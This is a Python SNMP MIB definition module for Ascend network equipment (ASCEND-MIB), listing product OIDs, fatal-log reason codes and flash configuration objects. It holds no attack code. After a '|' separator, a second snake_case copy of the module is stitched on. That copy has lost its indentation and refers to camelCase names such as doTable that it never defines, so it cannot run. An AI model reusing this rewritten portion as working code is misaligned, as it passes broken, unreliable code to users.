fatalLogSlotIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogSlotIndex.setStatus('mandatory')
fatalLogSoftwareVerion = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogSoftwareVerion.setStatus('mandatory')
fatalLogUserprofile = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogUserprofile.setStatus('mandatory')
fatalLogLoadName = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogLoadName.setStatus('mandatory')
fatalLogLocation = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogLocation.setStatus('mandatory')
fatalLogReason = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 55, 60, 61, 62, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 129, 130, 131, 135, 136, 140, 145, 146, 150, 151, 152, 153, 154, 160, 161, 165, 170, 171, 175, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 190, 191, 192, 193, 194, 195, 196, 197, 198, 200, 201, 210, 211, 220, 221, 300, 301, 302, 303, 304, 305, 306, 309, 310, 311, 312, 313, 314, 320, 321, 330, 381, 382, 383, 384, 385, 400, 550, 512, 767, 768, 800, 801, 999, 1001, 1002, 1003, 1005, 1006, 1007, 2001, 2002, 2010, 2022, 2100, 2101, 3001, 3002, 3003, 4000, 4100, 9998, 9999))).clone(namedValues=NamedValues(("fatalAssert", 1), ("fatalPoolsNoBuffer", 2), ("fatalProfileBad", 3), ("fatalSwitchTypeBad", 4), ("fatalLif", 5), ("fatalLcdError", 6), ("fatalIsacTimeout", 7), ("fatalSCCSpuriousInterrupt", 8), ("fatalExecInvalidSwitch", 9), ("fatalExecNoMailDesc", 10), ("fatalExecNoMailPoll", 11), ("fatalExecNoTask", 12), ("fatalExecNoTimer", 13), ("fataExecNoTimerPool", 14), ("fatalExecWaitInCtricalSection", 15), ("fatalDspDead", 16), ("fatalDspProtocolError", 17), ("fatalDspInternalError", 18), ("fatalDspLossOfSync", 19), ("fatalDspUnUsed", 20), ("fatalDDDDead", 21), ("fatalDDDProtocolError", 22), ("fatalX25Buffers", 23), ("fatalX25Init", 24), ("fatalX25Stack", 25), ("fatalZeroMemoryAlloc", 27), ("fatalNegativeMemoryAllocate", 28), ("fatalTaskLoop", 29), ("fatalMemcpyTooLarge", 30), ("fatalMemcpyNoMagic", 31), ("fatalMemcpyWrongMagic", 32), ("fatalMemcoyBadStart", 33), ("fatalIDECTimeout", 34), ("fatalExecRestricted", 35), ("fatalStackOverflow", 36), ("fatalDRAMCard", 37), ("fatalMbufPanic", 38), ("fatalNoPriority2Task", 39), ("fatalProtectionFault", 40), ("fatalClipping", 41), ("fatalReadyHangFault", 42), ("fatalExcessPostCompl", 43), ("fatalWriteProtect", 44), ("fatalPureVirtual", 45), ("fatalATMSVC", 46), ("fatalFRSVC", 47), ("fatalInterruptCode", 48), ("fatalLinkedListCorruption", 55), ("fatalBadPower", 60), ("fatalWatchdogTimeout", 61), ("fatalUnexplainedNMI", 62), ("fatalPrimarySelected", 98), ("fatalOperatorReset", 99), ("fatalSystemUp", 100), ("warningBufferInUse", 101), ("warningBufferWrongPool", 102), ("warningBufferWrongHeap", 103), ("warningBufferNotMemAlloc", 104), ("warningBufferBadMemAlloc", 105), ("warningBufferBogusPool", 106), ("warningBufferBogusHeap", 107), ("warningBufferNegativeMemalloc", 108), ("warningBufferZeroMemalloc", 109), ("warningBufferBoundary", 110), ("warningBufferTooBig", 111), ("warningBufferNull", 112), ("warningBufferSegmentCountZero", 113), ("warningBufferTrailerMagic", 114), ("warningBufferTrailerBuffer", 115), ("warningBufferTrailerLength", 116), ("warningBufferTrailerUserMagic", 117), ("warningBufferWriteAfterFree", 118), ("warningBufferNotInUse", 119), ("warningBufferMemcpyMagic", 120), ("warningBufferMemcpyMagicNext", 121), ("warningBufferNoExtraDRAM", 129), ("errprPPPAsuncBufferInUse", 130), ("warningIpcpIpLookup", 131), ("warningBadChunk", 135), ("warningUnexpectedIF", 136), ("warningNoTimers", 140), ("warningLCDAllocFailure", 145), ("warningLCDNonSense", 146), ("warningMemcpyTooLarge", 150), ("warningMemcpyNoMagic", 151), ("warningMemcpyWrongMagic", 152), ("warningMemcpyBadStart", 153), ("warningWANBufferLeak", 154), ("warningTermSrvState", 160), ("warningTermSrvSemaphore", 161), ("warningTelnetFreeDrv", 165), ("warningSTACTimeout", 170), ("warningSTACDataNotOwned", 171), ("warningExecFailure", 175), ("warningExecNoMailbox", 177), ("warningExecNoResources", 178), ("warningUnexpected", 179), ("warningChannelMapStuck", 180), ("warningChannelDisplayStuck", 181), ("warningNewCallNoDiscRequest", 182), ("warningNewCallNoDiscResp", 183), ("warningDisconnectRequestDropped", 184), ("warningSpyderBuffer", 185), ("warningSpyderDesc", 186), ("warningSpyderLoseChannel", 187), ("warningHscxSlowRelay", 188), ("warningTcpSbcontTooBig", 190), ("warningTcpSequenceGap", 191), ("warningTcpTooMuchData", 192), ("warningTcpTooMuchWrite", 193), ("warningTcpBadOptions", 194), ("warningLmodSlotDown", 195), ("warningLmodDspDown", 196), ("warningLmodDspmodemDown", 197), ("warningTcpXmitLooping", 198), ("warningOspfFatal", 200), ("warningOspfWarn", 201), ("warningBriJumperNotPresent", 210), ("warningBriJumperConfiguration", 211), ("infoCardBounced", 220), ("infoCardDown", 221), ("warningTacacsplusBase", 300), ("warningTacacsplusPointerInconsistency", 301), ("warningTacacsplusIndexInconsistency", 302), ("warningTacacsplusTcpInconsistency", 303), ("warningTacacsplusTcpOutofrangesocket", 304), ("warningTacacsplusSocketMismatch", 305), ("warningTacacsplusUnexpectedAuthState", 306), ("warningTacacsplusMax", 309), ("warningCidrWrongTree", 310), ("warningCidrNoMem", 311), ("warningCidrBusy", 312), ("warningCidrNonempty", 313), ("warningCidrDupDelete", 314), ("warningSauthWrongInfo", 320), ("warningSauthBadAddr", 321), ("warningGdbProtectionFault", 330), ("warningInFilterList", 381), ("warningNoCountInFilterList", 382), ("warningMismatchCountFilterList", 383), ("warningCdtUnprotectedAccess", 384), ("infoSystemResetOccurred", 385), ("warningBadPowerSupply", 400), ("warningEthernetNoTxBuf", 550), ("warningDspCrashMin", 512), ("warningDspCrashMax", 767), ("warningDspWrongSlot", 768), ("warningUnalignedAccess", 800), ("warningH323NoResources", 801), ("warningExecRestricted", 999), ("warningEthernetCuBusy", 1001), ("warningEthernetAckFailure", 1002), ("warningEthernetReset", 1003), ("warningEthernetCuActive", 1005), ("warningEthernetWaitScb", 1006), ("warningEthernetNoMACAddress", 1007), ("warningBaeepromChange", 2001), ("warningBaeepromImageMismatch", 2002), ("warningFlashTypeBad", 2010), ("warningMaxiopLoadFailure", 2022), ("warningPrimaryHWsetupFailed", 2100), ("warningSecondaryHWsetupFailed", 2101), ("warningIpxsapFilterMagic", 3001), ("warningIpxsapFilterCountZero", 3002), ("warningIpxsapFilterCountMismatch", 3003), ("warningModemTxChannelStuck", 4000), ("warningModemTxChannelRecovered", 4100), ("notApplicable", 9998), ("unknown", 9999)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogReason.setStatus('mandatory')
fatalLogAbsoluteTime = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogAbsoluteTime.setStatus('mandatory')
sysConfigFlashCmd = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("copyPCMCIAtoInternal", 1), ("copyInternalToPCMCIA", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigFlashCmd.setStatus('mandatory')
sysConfigFlashCopyStatus = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ok", 1), ("inProgress", 2), ("failed", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysConfigFlashCopyStatus.setStatus('mandatory')
sysConfigInternalFlashImageVersion = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysConfigInternalFlashImageVersion.setStatus('mandatory')
sysConfigPCMCIAFlashImageVersion = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 15, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysConfigPCMCIAFlashImageVersion.setStatus('mandatory')
mibinternetProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 1))
mibframeRelayProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 2))
mibanswerProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 3))
mibdS3NetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 4))
mibuds3NetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 5))
mibcadslNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 6))
mibdadslNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 7))
mibsdslNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 8))
mibvdslNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 9))
mibdmtAlDslNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 10))
miboc3AtmNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 11))
miblimSparingConfigProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 12))
mibds3AtmNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 13))
mibhdsl2NetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 14))
mibe3AtmNetworkProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 15))
mibredundancyProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 16))
mibredundancyStatsProfile = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23, 17))
mibBuilder.exportSymbols("ASCEND-MIB", mibe3AtmNetworkProfile=mibe3AtmNetworkProfile, atmpGroup=atmpGroup, hostTypeQuad=hostTypeQuad, dslPipeSdslCoe=dslPipeSdslCoe, consoleType=consoleType, mibdS3NetworkProfile=mibdS3NetworkProfile, callStatusGroup=callStatusGroup, doBegEndRemoteLB=doBegEndRemoteLB, sysSPROMCountries1=sysSPROMCountries1, consoleEntry=consoleEntry, doEntry=doEntry, max=max, pipe50LS56=pipe50LS56, consoleNumber=consoleNumber, sysSecsSinceStartup=sysSecsSinceStartup, sysConfigTftp=sysConfigTftp, sysConfigTftpFilename=sysConfigTftpFilename, dslPipe2S=dslPipe2S, max200=max200, hostStatusChannels=hostStatusChannels, max4002=max4002, voipGroup=voipGroup, max4004=max4004, mibds3AtmNetworkProfile=mibds3AtmNetworkProfile, resetStatWAN=resetStatWAN, sysConfigFlash=sysConfigFlash, fatalLogTable=fatalLogTable, hostTypeAim6=hostTypeAim6, fatalLogTableEntry=fatalLogTableEntry, pipe130T1=pipe130T1, miboc3AtmNetworkProfile=miboc3AtmNetworkProfile, console=console, pipe130N56=pipe130N56, sparingGroup=sparingGroup, doSlotIndex=doSlotIndex, fatalLogAbsoluteTime=fatalLogAbsoluteTime, mibanswerProfile=mibanswerProfile, mibdadslNetworkProfile=mibdadslNetworkProfile, consoleTable=consoleTable, hostStatusDialNum=hostStatusDialNum, slots=slots, mibvdslNetworkProfile=mibvdslNetworkProfile, flashGroup=flashGroup, lanTypeAny=lanTypeAny, consoleIndex=consoleIndex, sysReset=sysReset, fatalLogIndex=fatalLogIndex, configuration=configuration, max_tnt=max_tnt, lanTypeEtherData=lanTypeEtherData, consoleIf=consoleIf, hostStatus=hostStatus, multiShelf=multiShelf, sysConfigFlashCmd=sysConfigFlashCmd, max3000=max3000, doExtendBW=doExtendBW, pipe400=pipe400, mgGroup=mgGroup, sysSPROMOptions2=sysSPROMOptions2, sysLastRestartReason=sysLastRestartReason, fatalLogSoftwareVerion=fatalLogSoftwareVerion, advancedAgent=advancedAgent, apx_8000=apx_8000, pipeline=pipeline, hostStatusCallMgm=hostStatusCallMgm, cltmGroup=cltmGroup, DisplayString=DisplayString, fatalLogReason=fatalLogReason, dslPipeS=dslPipeS, systemStatusGroup=systemStatusGroup, hostStatusSlotIndex=hostStatusSlotIndex, hostStatusItemIndex=hostStatusItemIndex, lanModemGroup=lanModemGroup, doResynchronize=doResynchronize, hostStatusDataSvc=hostStatusDataSvc, sysConfigTftpStatus=sysConfigTftpStatus, pipe85=pipe85, cvmax100=cvmax100, dslPipeAdslCoeC=dslPipeAdslCoeC, hostTypeAim2=hostTypeAim2, hostStatusLocalName=hostStatusLocalName, mibredundancyStatsProfile=mibredundancyStatsProfile, products=products, asgGroup=asgGroup, dslTnt=dslTnt, firewallGroup=firewallGroup, doItemIndex=doItemIndex, hostStatusTable=hostStatusTable, sysAuthPreference=sysAuthPreference, sysConfigInternalFlashImageVersion=sysConfigInternalFlashImageVersion, sysSPROMSerialNumber=sysSPROMSerialNumber, dslmax20=dslmax20, mibsdslNetworkProfile=mibsdslNetworkProfile, stinger_10=stinger_10, sysConfigTftpParameter=sysConfigTftpParameter, terminator=terminator, hostStatusDuration=hostStatusDuration, max1800=max1800, doContractBW=doContractBW, wanDialoutPkt=wanDialoutPkt, powerSupply=powerSupply, resetStatEther=resetStatEther, pipe25Fx=pipe25Fx, lanTypeEthernet=lanTypeEthernet, aqueduct=aqueduct, miblimSparingConfigProfile=miblimSparingConfigProfile, doHangUp=doHangUp, consoleSecurity=consoleSecurity, dslPipeAdmt=dslPipeAdmt, sessionStatusGroup=sessionStatusGroup, sysConfigPCMCIAFlashImageVersion=sysConfigPCMCIAFlashImageVersion, sysLoadName=sysLoadName, max4000=max4000, pipe220=pipe220, resetStatAll=resetStatAll, doBegEndBERT=doBegEndBERT, miscGroup=miscGroup, pipe130V35=pipe130V35, pipe25=pipe25, dslPipeAdslCoeD=dslPipeAdslCoeD, ascend=ascend, spipe155T1=spipe155T1, pipe25Px=pipe25Px, multiband=multiband, mibhdsl2NetworkProfile=mibhdsl2NetworkProfile, mibdmtAlDslNetworkProfile=mibdmtAlDslNetworkProfile, spipe95=spipe95, resetStat=resetStat, dslPipeAlctlDmt=dslPipeAlctlDmt, sysConfigRadiusCmd=sysConfigRadiusCmd, lanTypes=lanTypes, hostStatusCallState=hostStatusCallState, sysConfigTftpPort=sysConfigTftpPort, sysConfigTftpCmd=sysConfigTftpCmd, sysConfigRadiusStatus=sysConfigRadiusStatus, sysAbsoluteStartupTime=sysAbsoluteStartupTime, fatalLogUserprofile=fatalLogUserprofile, fatalLogSlotIndex=fatalLogSlotIndex, mCastGroup=mCastGroup, max800=max800, aq300=aq300, eventGroup=eventGroup, hostTypeAny=hostTypeAny, sysMibMinorRevNum=sysMibMinorRevNum, consoleSpecific=consoleSpecific, doDial=doDial, mibinternetProfile=mibinternetProfile, mibredundancyProfile=mibredundancyProfile, dslPipeSdslCoe2S=dslPipeSdslCoe2S, fatalLogLoadName=fatalLogLoadName, sysConfigChange=sysConfigChange, srvcMgmtGroup=srvcMgmtGroup, max6000=max6000, hostStatusEntry=hostStatusEntry, sysConfigRadius=sysConfigRadius, mibuds3NetworkProfile=mibuds3NetworkProfile, max2000=max2000, pipe15=pipe15, sysSPROMOptions1=sysSPROMOptions1, radiusGroup=radiusGroup, sysSPROM=sysSPROM, hostTypes=hostTypes, sysAbsoluteCurrentTime=sysAbsoluteCurrentTime, mibcadslNetworkProfile=mibcadslNetworkProfile, doAnswer=doAnswer, sysMibVersionNum=sysMibVersionNum, hostStatusCallType=hostStatusCallType, resourcesGroup=resourcesGroup, dslPipe50SdslCell=dslPipe50SdslCell, sysConfigTftpHostAddr=sysConfigTftpHostAddr, dslPipeSdslHs=dslPipeSdslHs, fatalLogLocation=fatalLogLocation, hostStatusRemName=hostStatusRemName, doGroup=doGroup, doTable=doTable, hostTypeDual=hostTypeDual, dslPipeAcap=dslPipeAcap, mibframeRelayProfile=mibframeRelayProfile, pipe50=pipe50, callLoggingGroup=callLoggingGroup, pipe75=pipe75, sysConfigFlashCopyStatus=sysConfigFlashCopyStatus)
| (integer, object_identifier, octet_string) = mibBuilder.importSymbols('ASN1', 'Integer', 'ObjectIdentifier', 'OctetString')
(named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(constraints_intersection, single_value_constraint, value_range_constraint, value_size_constraint, constraints_union) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'ConstraintsIntersection', 'SingleValueConstraint', 'ValueRangeConstraint', 'ValueSizeConstraint', 'ConstraintsUnion')
(notification_group, module_compliance) = mibBuilder.importSymbols('SNMPv2-CONF', 'NotificationGroup', 'ModuleCompliance')
(enterprises, counter64, notification_type, module_identity, iso, mib_scalar, mib_table, mib_table_row, mib_table_column, object_identity, ip_address, bits, integer32, counter32, mib_identifier, gauge32, unsigned32, time_ticks) = mibBuilder.importSymbols('SNMPv2-SMI', 'enterprises', 'Counter64', 'NotificationType', 'ModuleIdentity', 'iso', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'ObjectIdentity', 'IpAddress', 'Bits', 'Integer32', 'Counter32', 'MibIdentifier', 'Gauge32', 'Unsigned32', 'TimeTicks')
(display_string, textual_convention) = mibBuilder.importSymbols('SNMPv2-TC', 'DisplayString', 'TextualConvention')
class Displaystring(OctetString):
pass
ascend = mib_identifier((1, 3, 6, 1, 4, 1, 529))
products = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1))
slots = mib_identifier((1, 3, 6, 1, 4, 1, 529, 2))
host_types = mib_identifier((1, 3, 6, 1, 4, 1, 529, 3))
advanced_agent = mib_identifier((1, 3, 6, 1, 4, 1, 529, 4))
lan_types = mib_identifier((1, 3, 6, 1, 4, 1, 529, 5))
do_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 6))
host_status = mib_identifier((1, 3, 6, 1, 4, 1, 529, 7))
console = mib_identifier((1, 3, 6, 1, 4, 1, 529, 8))
system_status_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 9))
event_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 10))
call_status_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 11))
session_status_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 12))
radius_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 13))
m_cast_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 14))
lan_modem_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 15))
firewall_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 16))
wan_dialout_pkt = mib_identifier((1, 3, 6, 1, 4, 1, 529, 17))
power_supply = mib_identifier((1, 3, 6, 1, 4, 1, 529, 18))
multi_shelf = mib_identifier((1, 3, 6, 1, 4, 1, 529, 19))
misc_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 20))
asg_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 21))
flash_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 22))
configuration = mib_identifier((1, 3, 6, 1, 4, 1, 529, 23))
atmp_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 24))
call_logging_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 25))
srvc_mgmt_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 26))
resources_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 27))
voip_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 28))
mg_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 29))
sparing_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 30))
cltm_group = mib_identifier((1, 3, 6, 1, 4, 1, 529, 31))
multiband = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 1))
max = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2))
pipeline = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3))
max_tnt = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 4)).setLabel('max-tnt')
dsl_tnt = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 5))
aqueduct = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 6))
stinger_10 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 7)).setLabel('stinger-10')
apx_8000 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 8)).setLabel('apx-8000')
max200 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 1))
max1800 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 2))
max2000 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 3))
max4000 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 4))
max4002 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 5))
max4004 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 6))
max6000 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 7))
max800 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 8))
max3000 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 9))
dslmax20 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 10))
terminator = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 11))
cvmax100 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 12))
pipe15 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 1))
pipe25 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 2))
pipe25_px = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 3))
pipe25_fx = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 4))
pipe50 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 5))
pipe75 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 6))
pipe130_t1 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 7))
pipe400 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 8))
pipe220 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 9))
dsl_pipe_acap = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 10))
dsl_pipe_s = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 11))
dsl_pipe2_s = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 12))
dsl_pipe_admt = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 21))
dsl_pipe_alctl_dmt = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 22))
dsl_pipe_adsl_coe_c = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 13))
dsl_pipe_sdsl_coe = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 14))
dsl_pipe_sdsl_coe2_s = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 15))
dsl_pipe_adsl_coe_d = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 20))
pipe85 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 16))
pipe50_ls56 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 17))
pipe130_v35 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 18))
pipe130_n56 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 19))
spipe95 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 23))
spipe155_t1 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 24))
dsl_pipe50_sdsl_cell = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 25))
dsl_pipe_sdsl_hs = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 26))
aq300 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 1, 6, 1))
host_type_any = mib_identifier((1, 3, 6, 1, 4, 1, 529, 3, 1))
host_type_dual = mib_identifier((1, 3, 6, 1, 4, 1, 529, 3, 2))
host_type_quad = mib_identifier((1, 3, 6, 1, 4, 1, 529, 3, 3))
host_type_aim2 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 3, 4))
host_type_aim6 = mib_identifier((1, 3, 6, 1, 4, 1, 529, 3, 5))
lan_type_any = mib_identifier((1, 3, 6, 1, 4, 1, 529, 5, 1))
lan_type_ethernet = mib_identifier((1, 3, 6, 1, 4, 1, 529, 5, 2))
lan_type_ether_data = mib_identifier((1, 3, 6, 1, 4, 1, 529, 5, 3))
do_table = mib_table((1, 3, 6, 1, 4, 1, 529, 6, 1))
if mibBuilder.loadTexts:
doTable.setStatus('mandatory')
do_entry = mib_table_row((1, 3, 6, 1, 4, 1, 529, 6, 1, 1)).setIndexNames((0, 'ASCEND-MIB', 'doSlotIndex'), (0, 'ASCEND-MIB', 'doItemIndex'))
if mibBuilder.loadTexts:
doEntry.setStatus('mandatory')
do_slot_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
doSlotIndex.setStatus('mandatory')
do_item_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
doItemIndex.setStatus('mandatory')
do_dial = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 3), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doDial.setStatus('mandatory')
do_hang_up = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 4), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doHangUp.setStatus('mandatory')
do_answer = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 5), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doAnswer.setStatus('mandatory')
do_extend_bw = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 6), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doExtendBW.setStatus('mandatory')
do_contract_bw = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 7), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doContractBW.setStatus('mandatory')
do_beg_end_remote_lb = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 8), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doBegEndRemoteLB.setStatus('mandatory')
do_beg_end_bert = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 9), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doBegEndBERT.setStatus('mandatory')
do_resynchronize = mib_table_column((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 10), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('valid', 1), ('notValid', 2)))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
doResynchronize.setStatus('mandatory')
host_status_table = mib_table((1, 3, 6, 1, 4, 1, 529, 7, 1))
if mibBuilder.loadTexts:
hostStatusTable.setStatus('mandatory')
host_status_entry = mib_table_row((1, 3, 6, 1, 4, 1, 529, 7, 1, 1)).setIndexNames((0, 'ASCEND-MIB', 'hostStatusSlotIndex'), (0, 'ASCEND-MIB', 'hostStatusItemIndex'))
if mibBuilder.loadTexts:
hostStatusEntry.setStatus('mandatory')
host_status_slot_index = mib_table_column((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
